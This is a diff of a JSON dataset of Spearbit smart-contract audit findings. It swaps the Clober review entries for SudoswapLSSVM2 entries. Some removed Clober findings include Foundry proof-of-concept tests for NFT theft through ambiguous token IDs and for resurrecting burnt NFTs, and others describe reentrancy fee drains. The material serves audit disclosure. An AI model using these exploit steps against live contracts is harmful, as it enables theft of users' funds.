0, baseAmount: 10**18, options: _buildLimitOrderOptions(Constants.ASK, Constants.POST_ONLY), data: new bytes(0) }); // Step 2. Given the `OrderKey` which represents the created limit order, an attacker can craft ambiguous tokenIds ,! CloberOrderBook.OrderKey memory order_key = CloberOrderBook.OrderKey({isBid: false, priceIndex: priceIndex, orderIndex: orderIndex}); ,! uint256 tokenId = orderToken.encodeId(order_key); uint256 ambiguous_tokenId = tokenId + (1 << 255); // crafting ambiguous tokenId // Step 3. Attacker approves both victim (can be a third-party protocol like OpenSea) and his other account ,! vm.startPrank(attacker); orderToken.approve(victim, tokenId); orderToken.approve(attacker2, ambiguous_tokenId); vm.stopPrank(); // Step 4. Victim transfers the NFT to the themselves. (Or attacker trades it) vm.startPrank(victim); orderToken.transferFrom(attacker, victim, tokenId); vm.stopPrank(); // Step 5. Attacker steals the NFT vm.startPrank(attacker2); orderToken.transferFrom(victim, attacker2, ambiguous_tokenId); vm.stopPrank();", + "title": "Caller of swapTokenForSpecificNFTs() must be able to receive ETH", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The function _refundTokenToSender() sends ETH back to the caller. If this caller is a contract then it might not be able to receive ETH. If it can't receive ETH then the transaction will revert. function _refundTokenToSender(uint256 inputAmount) internal override { // Give excess ETH back to caller if (msg.value > inputAmount) { payable(msg.sender).safeTransferETH(msg.value - inputAmount); } }", "labels": [ "Spearbit", - "Clober", - "Severity: Critical Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Missing owner check on from when transferring tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The OrderNFT.transferFrom/safeTransferFrom use the internal _transfer function. While they check approvals on msg.sender through _isApprovedOrOwner(msg.sender, tokenId), it is never checked that the specified from parameter is actually the owner of the NFT. An attacker can decrease other users' NFT balances, making them unable to cancel or claim their NFTs and locking users' funds. The attacker transfers their own NFT passing the victim as from by calling transfer- From(from=victim, to=attackerAccount, tokenId=attackerTokenId). This passes the _isApprovedOrOwner check, but reduces from's balance.", + "title": "order.doPropertyCheck could be replaced by the pair's propertyChecker()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The field+check for a separate order.doPropertyCheck in struct SellOrder is unnecessary be- cause this can already be checked via the pair's propertyChecker() without relying on the user to explicitly specify it in their order.", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Wrong minimum net fee check", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "A minimum net fee was introduced that all markets should comply by such that the protocol earns fees. The protocol fees are computed takerFee + makerFee and the market factory computes the wrong check. Fee pairs that should be accepted are currently not accepted, and even worse, fee pairs that should be rejected are currently accepted. Market creators can avoid collecting protocol fees this way.", + "title": "_payProtocolFeeFromPair() could be replaced with _sendTokenOutput()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Both ERC20 and ETH versions of _payProtocolFeeFromPair() and _sendTokenOutput() are iden- tical in their parameters and logic.", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Rounding up of taker fees of constituent orders may exceed collected fee", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "If multiple orders are taken, the taker fee calculated is rounded up once, but that of each taken maker order could be rounded up as well, leading to more fees accounted for than actually taken. Example: takerFee = 100011 (10.0011%) 2 maker orders of amounts 400000 and 377000 total amount = 400000 + 377000 = 777000 Taker fee taken = 777000 * 100011 / 1000000 = 77708.547 = 777709 Maker fees would be 13 377000 * 100011 / 1000000 = 37704.147 = 37705 400000 * 100011 / 1000000 = 40004.4 = 40005 which is 1 wei more than actually taken. Below is a foundry test to reproduce the problem, which can be inserted into Claim.t.sol: function testClaimFeesFailFromRounding() public { _createOrderBook(0, 100011); // 10.0011% taker fee // create 2 orders uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); uint256 orderIndex2 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); // take both orders _createTakeOrder(Constants.BID, 2 * Constants.RAW_AMOUNT); CloberOrderBook.OrderKey[] memory ids = new CloberOrderBook.OrderKey[](2); ids[0] = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex1 }); ids[1] = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex2 }); // perform claim orderBook.claim( address(this), ids ); // (uint128 quoteFeeBal, uint128 baseFeeBal) = orderBook.getFeeBalance(); // console.log(quoteFeeBal); // fee accounted = 20004 // console.log(baseFeeBal); // fee accounted = 0 // console.log(quoteToken.balanceOf(address(orderBook))); // actual fee collected = 20003 // try to claim fees, will revert vm.expectRevert(\"ERC20: transfer amount exceeds balance\"); orderBook.collectFees(); }", + "title": "False positive in test_getSellInfoWithoutFee() when delta == FixedPointMathLib.WAD due to wrong implementation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "In test_getSellInfoWithoutFee, delta is not validated via validateDelta, which causes a false positive in the current test when delta == FixedPointMathLib.WAD. This can be tried with the following proof of concept // SPDX-License-Identifier: MIT pragma solidity ^0.8.15; import {FixedPointMathLib} from ,! \"https://raw.githubusercontent.com/transmissions11/solmate/main/src/utils/FixedPointMathLib.sol\"; contract test{ using FixedPointMathLib for uint256; constructor() { uint256 delta = FixedPointMathLib.WAD; uint256 invDelta = FixedPointMathLib.WAD.divWadDown(delta); uint outputValue = delta.divWadDown(FixedPointMathLib.WAD - invDelta); // revert } }", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Drain tokens condition due to reentrancy in collectFees", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "collectFees function is not guarded by a re-entrancy guard. In case a transfer of at least one of the tokens in a trading pair allows to invoke arbitrary code (e.g. token implementing callbacks/hooks), it is possible for a malicious host to drain trading pools. The re-entrancy condition allows to transfer collected fees multiple times to both DAO and the host beyond the actual fee counter.", + "title": "Checks-Effects-Interactions pattern not used in swapNFTsForToken()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "It is a defensive programming pattern to first take NFTs and then send the tokens (i.e. the Checks- Effects-Interactions pattern). function swapNFTsForToken(...) ... { ... _sendTokenOutput(tokenRecipient, outputAmount); ... _sendTokenOutput(royaltyRecipients[i], royaltyAmounts[i]); ... _payProtocolFeeFromPair(_factory, protocolFee); ... _takeNFTsFromSender(...); ... }", "labels": [ "Spearbit", - "Clober", - "Severity: High Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Group claim clashing condition", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Claim functionality is designed to support 3rd party operators to claim multiple orders on behalf of market's users to finalise the transactions, deliver assets and earn bounties. The code allows to iterate over a list of orders to execute _claim. function claim(address claimer, OrderKey[] calldata orderKeys) external nonReentrant revertOnDelegateCall { uint32 totalBounty = 0; for (uint256 i = 0; i < orderKeys.length; i++) { ... (uint256 claimedTokenAmount, uint256 minusFee, uint64 claimedRawAmount) = _claim( queue, mOrder, orderKey, claimer ); ... } } However, neither claim nor _claim functions in OrderBook support skipping already fulfilled orders. On the con- trary in case of a revert in _claim the whole transaction is reverted. function _claim(...) private returns (...) { ... require(mOrder.openOrderAmount > 0, Errors.OB_INVALID_CLAIM); ... } Such implementation does not support fully the initial idea of 3rd party operators claiming orders in batches. A transaction claiming multiple orders at once can easily clash with others and be reverted completely, effectively claiming nothing - just wasting gas. Clashing can happen for instance when two bots got overlapping lists of orders or when the owner of the order decides to claim or cancel his/her order manually while the bot is about to claim it as well. 15", + "title": "Two versions of withdrawERC721() and withdrawERC1155()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "withdrawERC721() and withdrawERC1155() with slightly different implementations. This is more difficult to maintain.", "labels": [ "Spearbit", - "Clober", - "Severity: Medium Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Order owner isn't zeroed after burning", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The order's owner is not zeroed out when the NFT is burnt. As a result, while the onBurn() method records the NFT to have been transferred to the zero address, ownerOf() still returns the current order's owner. This allows for unexpected behaviour, like being able to call approve() and safeTransferFrom() functions on non-existent tokens. A malicious actor could sell such resurrected NFTs on secondary exchanges for profit even though they have no monetary value. Such NFTs will revert on cancellation or claim attempts since openOrderAmount is zero. function testNFTMovementAfterBurn() public { _createOrderBook(0, 0); address attacker2 = address(0x1337); // Step 1: make 2 orders to avoid bal sub overflow when moving burnt NFT in step 3 uint256 orderIndex1 = _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); _createPostOnlyOrder(Constants.BID, Constants.RAW_AMOUNT); CloberOrderBook.OrderKey memory orderKey = CloberOrderBook.OrderKey({ isBid: Constants.BID, priceIndex: Constants.PRICE_INDEX, orderIndex: orderIndex1 }); uint256 tokenId = orderToken.encodeId(orderKey); // Step 2: burn 1 NFT by cancelling one of the orders vm.startPrank(Constants.MAKER); orderBook.cancel( Constants.MAKER, _toArray(orderKey) ); // verify ownership is still maker assertEq(orderToken.ownerOf(tokenId), Constants.MAKER, \"NFT_OWNER\"); // Step 3: resurrect burnt token by calling safeTransferFrom orderToken.safeTransferFrom( Constants.MAKER, attacker2, tokenId ); // verify ownership is now attacker2 assertEq(orderToken.ownerOf(tokenId), attacker2, \"NFT_OWNER\"); }", + "title": "Missing sanity/threshold checks may cause undesirable behavior and/or waste of gas", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Numerical user inputs and external call returns that are subject to thresholds due to the contract's logic should be checked for sanity to avoid undesirable behavior or reverts in later logic and wasting unnecessary gas in the process.", "labels": [ "Spearbit", - "Clober", - "Severity: Medium Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Lack of two-step role transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The contracts lack two-step role transfer. Both the ownership of the MarketFactory as well as the change of market's host are implemented as single-step functions. The basic validation whether the address is not a zero address for a market is performed, however the case when the address receiving the role is inaccessible is not covered properly. Taking into account the handOverHost can be invoked without any supervision, by anyone who created the market it is possible to make a typo unintentionally or intentionally if the attacker wants simply to brick fees collection as currently the host affects collectFees in OrderBook (described as a separate issue). The ownership transfer in theory should be less error-prone as it should be done by DAO with great care, however still two-step role transfer should be preferable.", + "title": "Deviation from standard/uniform naming convention affects readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Following standard/uniform naming conventions are essential to make a codebase easy to read and understand.", "labels": [ "Spearbit", - "Clober", - "Severity: Medium Risk" + "SudoswapLSSVM2", + "Severity: Informational LSSVMPairFactory.sol#L471, LSSVMRouter.sol#L128-L135," ] }, { - "title": "Atomic fees delivery susceptible to funds lockout", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The collectFees function delivers the quoteToken part of fees as well as the baseToken part of fees atomically and simultaneously to both the DAO and the host. In case a single address is for instance blacklisted (e.g. via USDC blacklist feature) or a token in a pair happens to be malicious and configured the way transfer to one of the addresses reverts it is possible to block fees delivery. 17 function collectFees() external nonReentrant { // @audit delivers both tokens atomically require(msg.sender == _host(), Errors.ACCESS); if (_baseFeeBalance > 1) { _collectFees(_baseToken, _baseFeeBalance - 1); _baseFeeBalance = 1; } if (_quoteFeeBalance > 1) { _collectFees(_quoteToken, _quoteFeeBalance - 1); _quoteFeeBalance = 1; } } function _collectFees(IERC20 token, uint256 amount) internal { // @audit delivers to both wallets uint256 daoFeeAmount = (amount * _DAO_FEE) / _FEE_PRECISION; uint256 hostFeeAmount = amount - daoFeeAmount; _transferToken(token, _daoTreasury(), daoFeeAmount); _transferToken(token, _host(), hostFeeAmount); } There are multiple cases when such situation can happen for instance: a malicious host wants to block the function for DAO to prevent collecting at least guaranteed valuable quoteToken or a hacked DAO can swap treasury to some invalid address and renounce ownership to brick collectFees across multiple markets. Taking into account the current implementation in case it is not possible to transfer tokens it is necessary to swap the problematic address, however depending on the specific case it might be not trivial.", + "title": "Function _getRoyaltyAndSpec() contains code duplication which affects maintainability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The function _getRoyaltyAndSpec() is rather long and contains code duplication. This makes it difficult to maintain. 45 function _getRoyaltyAndSpec(address tokenAddress, uint256 tokenId, uint256 value) ... if (spec <= NOT_CONFIGURED && spec > NONE) { try IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId) returns (...) { // Support Art Blocks override require(recipients_.length == bps.length); return (recipients_, _computeAmounts(value, bps), ARTBLOCKS, royaltyAddress, addToCache); } catch {} ... } else { // Spec exists, just execute the appropriate one ... ... if (spec == ARTBLOCKS) { // Art Blocks spec uint256[] memory bps; (recipients, bps) = IArtBlocksOverride(royaltyAddress).getRoyalties(tokenAddress, tokenId); require(recipients.length == bps.length); return (recipients, _computeAmounts(value, bps), spec, royaltyAddress, addToCache); } else ... }", "labels": [ "Spearbit", - "Clober", - "Severity: Medium Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "DAO fees potentially unavailable due to overly strict access control", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The collectFees function is guarded by an inline access control require statement condition which prevents anyone, except a host, from invoking the function. Only the host of the market is authorized to invoke, effectively deliver all collected fees, including the part of the fees belonging to the DAO. function collectFees() external nonReentrant { require(msg.sender == _host(), Errors.ACCESS); // @audit only host authorized if (_baseFeeBalance > 1) { _collectFees(_baseToken, _baseFeeBalance - 1); _baseFeeBalance = 1; } if (_quoteFeeBalance > 1) { _collectFees(_quoteToken, _quoteFeeBalance - 1); _quoteFeeBalance = 1; } } This access control is too strict and can lead to funds being locked permanently in the worst case scenario. As the host is a single point of failure in case access to the wallet is lost or is incorrectly transferred the fees for both the host and the DAO will be locked.", + "title": "getSellInfo always adds 1 rather than rounding which leads to last item being sold at 0", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Based on the comment // We calculate how many items we can sell into the linear curve until the spot price reaches 0, rounding up. In cases where delta == spotPrice && numItems > 1, the last item would be sold at 0: delta = 100; spotPrice = 100; numItems = 2; uint256 totalPriceDecrease = delta * numItems = 200; Therefore succeeds at: if (spotPrice < totalPriceDecrease) Later calculated: uint256 numItemsTillZeroPrice = spotPrice / delta + 1; That would result in 2, while the division was an exact 1, therefore is not rounded up in case where spotPrice == delta but increased always by 1.", "labels": [ "Spearbit", - "Clober", - "Severity: Medium Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "OrderNFT ownership and market host transfers are done separately", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The market host is entitled to 80% of the fees collected, and is able to set the URI of the correspond- ing orderToken NFT. However, transferring the market host and the orderToken NFT is done separately. It is thus possible for a market host to transfer one but not the other.", + "title": "Natspec for robustSwapETHForSpecificNFTs() is slightly misleading", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The function robustSwapETHForSpecificNFTs() has this comment: * @dev We assume msg.value >= sum of values in maxCostPerPair This doesn't have to be the case. The transaction just reverts if msg.value isn't sufficient.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "OrderNFTs can be renamed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The OrderNFT contract's name and symbol can be changed at any time by the market host. Usually, these fields are immutable for ERC721 NFTs. There might be potential issues with off-chain indexers that cache only the original value. Furthermore, suddenly renaming tokens by a malicious market host could lead to web2 phishing attacks.", + "title": "Two copies of pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From() are present", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Both contracts LSSVMRouter and VeryFastRouter contain the functions pairTransferERC20From(), pairTransferNFTFrom() and pairTransferERC1155From(). This is more difficult to maintain as both copies have to stay in synch.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "DOSing _replaceStaleOrder() due to reverting on token transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "In the case of tokens with implemented hooks, a malicious order owner can revert on token received event thus cause a denial-of-service via _replaceStaleOrder(). The probability of such an attack is very low, because the order queue has to be full and it is unusual for tokens to implement hooks.", + "title": "Not using error strings in require statements obfuscates monitoring", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "require statements should include meaningful error messages to help with monitoring the system.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Total claimable bounties may exceed type(uint32).max", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Individual bounties are capped to type(uint32).max which is ~4.295 of a native token of 18 decimals (4.2949673e18 wei). It's possible (and likely in the case of Polygon network) for their sum to therefore exceed type(uint32).max.", + "title": "prices and balances in the curves may not be updated after calls to depositNFTs() and depositERC20()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The functions depositNFTs() and depositERC20() allow anyone to add NFTs and/or ERC20 to a pair but do not update the prices and balances in the curves. And if they were to do so, then the functions might be abused to update token prices with irrelevant tokens and NFTs. However, it is not clear if/how the prices and balances in the curves are updated to reflect this. The owner can't fully rely on emits.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Can fake market order in TakeOrder event", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Market orders in Orderbook.marketOrder set the 8-th bit of options. This options value is later used in _take's TakeOrder event. However, one can call Orderbook.limitOrder with this 8-th bit set and spoof a market order event.", + "title": "Functions enableSettingsForPair() and disableSettingsForPair() can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The functions enableSettingsForPair() and disableSettingsForPair() define a temporary vari- able pair. This could also be used earlier in the code to simplify the code. function enableSettingsForPair(address settings, address pairAddress) public { require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); LSSVMPair pair = LSSVMPair(pairAddress); ... } function disableSettingsForPair(address settings, address pairAddress) public { require(isPair(pairAddress, LSSVMPair(pairAddress).pairVariant()), \"Invalid pair address\"); ... LSSVMPair pair = LSSVMPair(pairAddress); ... }", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "_priceToIndex will revert if price is type(uint128).max", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Because price is type uint128, the increment will overflow first before it is casted to uint256 uint256 shiftedPrice = uint256(price + 1) << 64;", + "title": "Design asymmetry decreases code readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The function _calculateBuyInfoAndUpdatePoolParams() performs a check on maxExpectedToken- Input inside its function. On the other hand, the comparable check for _calculateSellInfoAndUpdatePoolParams() is done outside of the function: function _swapNFTsForToken(...) ... { // LSSVMPairERC721.sol ... (protocolFee, outputAmount) = _calculateSellInfoAndUpdatePoolParams(...) require(outputAmount >= minExpectedTokenOutput, \"Out too few tokens\"); ... } The asymmetry in the design of these functions affects code readability and may confuse the reader.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "using block.chainid for create2 salt can be problematic if there's chain hardfork", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Using block.chainid as salt for create2 can result in inconsistency if there is a chain split event(eg. eth2 merge). This will make 2 different chains that has different chainid(one with original chain id and one with random new value). Which will result in making one of the chains not able to interact with markets, nfts properly. Also, it will make things hard to do a fork testing which changes chainid for local environment.", + "title": "Providing the same _nftID multiple times will increase numPairNFTsWithdrawn multiple times to potentially cause confusion", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "If one accidentally (or intentionally) supplies the same id == _nftID multiple times in the array ids[], then numPairNFTsWithdrawn is increased multiple times. Assuming this value is used via indexing for the user interface, this could be misleading.", "labels": [ "Spearbit", - "Clober", - "Severity: Low Risk" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Use get64Unsafe() when updating claimable in take()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "get64Unsafe() can be used when fetching the stored claimable value since _getClaimableIndex() returns elementIndex < 4", + "title": "Dual interface NFTs may cause unexpected behavior if not considered in future", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Some NFTs support both the ERC721 and the ERC1155 standard. For example NFTs of the Sandbox project. Additionally, the internal layout of the parameters of cloneETHPair and cloneERC1155ETHPair are very similar: | cloneETHPair | cloneERC1155ETHPair | | --- | --- | | mstore(add(ptr, 0x3e), shl(0x60, factory)) | mstore(add(ptr, 0x3e), shl(0x60, factory)) | | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | mstore(add(ptr, 0x52), shl(0x60, bondingCurve)) | | mstore(add(ptr, 0x66), shl(0x60, nft)) | mstore(add(ptr, 0x66), shl(0x60, nft)) | | mstore8(add(ptr, 0x7a), poolType) | mstore8(add(ptr, 0x7a), poolType) | | mstore(add(ptr, 0x7b), shl(0x60, propertyChecker)) | mstore(add(ptr, 0x7b), nftId) | In case there is a specific function that only works on ERC721, and that can be applied to ERC1155 pairs, in combination with an NFT that supports both standards, then an unexpected situation could occur. Currently, this is not the case, but that might occur in future iterations of the code.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Check is zero is cheaper than check if the result is a concrete value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Checking if the result is zero vs. checking if the result is/isn't a concrete value should save 1 opcode.", + "title": "Missing event emission in multicall", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Not emitting events on success/failure of calls within a multicall makes debugging failed multicalls difficult. There are several actions that should always emit events for transparency such as ownership change, transfer of ether/tokens etc. In the case of a multicall function, it is recommended to emit an event for succeeding (or failing) calls.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Function argument can be skipped", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The address caller parameter in the internal _cancel function can be replaced with msg.sender as effectively this is the value that is actually used when the function is invoked.", + "title": "Returning only one type of fee from getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuote- WithRoyalties() could be misleading", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The functions getBuyNFTQuote(), getSellNFTQuote() and getSellNFTQuoteWithRoyalties() re- turn a protocolFee variable. There are also other fees like tradeFee and royaltyTotal that are not returned from these functions. Given that these functions might be called from the outside, it is not clear why other fees are not included here.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Redundant flash loan balance cap", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The requested flash loan amounts are checked against and capped up to the contract's token bal- ances, so the caller has to validate and handle the case where the tokens received are below the requested amounts. It would be better to optimize for the success case where there are sufficient tokens. Otherwise, let the function revert from failure to transfer the requested tokens instead.", + "title": "Two ways to query the assetRecipient could be confusing", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "The contract LSSVMPair has two ways to query the assetRecipient. On via the getter assetRecip- ient() and one via getAssetRecipient(). Both give different results and generally getAssetRecipient() should be used. Having two ways could be confusing. address payable public assetRecipient; function getAssetRecipient() public view returns (address payable _assetRecipient) { ... // logic to determine _assetRecipient }", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Do direct assignment to totalBaseAmount and totalQuoteAmount", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "While iterating through multiple claims, totalBaseAmount and totalQuoteAmount are reset and as- signed a value each iteration. Since they are only incremented in the referenced block (and are mutually exclusive cases), the assignment can be direct instead of doing an increment.", + "title": "Functions expecting NFT deposits can validate parameters for sanity and optimization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Functions expecting NFT deposits in their typical flows can validate parameters for sanity and opti- mization.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Redundant zero minusFee setter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "minusFee defaults to zero, so the explicit setting of it is redundant.", + "title": "Functions expecting ETH deposits can check msg.value for sanity and optimization", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Functions that expect ETH deposits in their typical flows can check for non-zero values of msg.value for sanity and optimization.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Load _FEE_PRECISION into local variable before usage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "Loading _FEE_PRECISION into a local variable slightly reduced bytecode size (0.017kB) and was found to be a tad more gas efficient.", + "title": "LSSVMPairs can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "At the different LSSVMPairs, PairVariant and IMMUTABLE_PARAMS_LENGTH can be passed to LSSVM- Pair, which could store them as immutable. Then functions pairVariant() and _immutableParamsLength() can also be moved to LSSVMPair, which would simplify the code.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Can cache value difference in SegmentedSegmentTree464.update", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The replaced - value expression in SegmentedSegmentTree464.pop is recomputed several times in each loop iteration.", + "title": "Unused values in catch can be avoided for better readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "Employing a catch clause with higher verbosity may reduce readability. Solidity supports different kinds of catch blocks depending on the type of error. However, if the error data is of no interest, one can use a simple catch statement without error data.", "labels": [ "Spearbit", - "Clober", - "Severity: Gas Optimization" + "SudoswapLSSVM2", + "Severity: Informational" ] }, { - "title": "Unnecessary loop condition in pop", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Clober-Spearbit-Security-Review.pdf", - "body": "The loop variable l in SegmentedSegmentTree464.pop is an unsigned int, so the loop condition l >= 0 is always true. The reason why it still terminates is that the first layer only has group index 0 and 1, so the rightIndex.group - leftIndex.group < 4 condition is always true when the first layer is reached, and then it terminates with the break keyword.", + "title": "Stale constant and comments reduce readability", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/SudoswapLSSVM2-Spearbit-Security-Review.pdf", + "body": "After some updates, the logic was added ~2 years ago when enum was changed to int16. Based on the comments and given that was upgradeable, it was expected that one could add new unconfigured specs with negative IDs between NONE (by decrementing it) and NOT_CONFIGURED. In this non-upgradeable fork, the current constants treat only the spec ID of 0 as 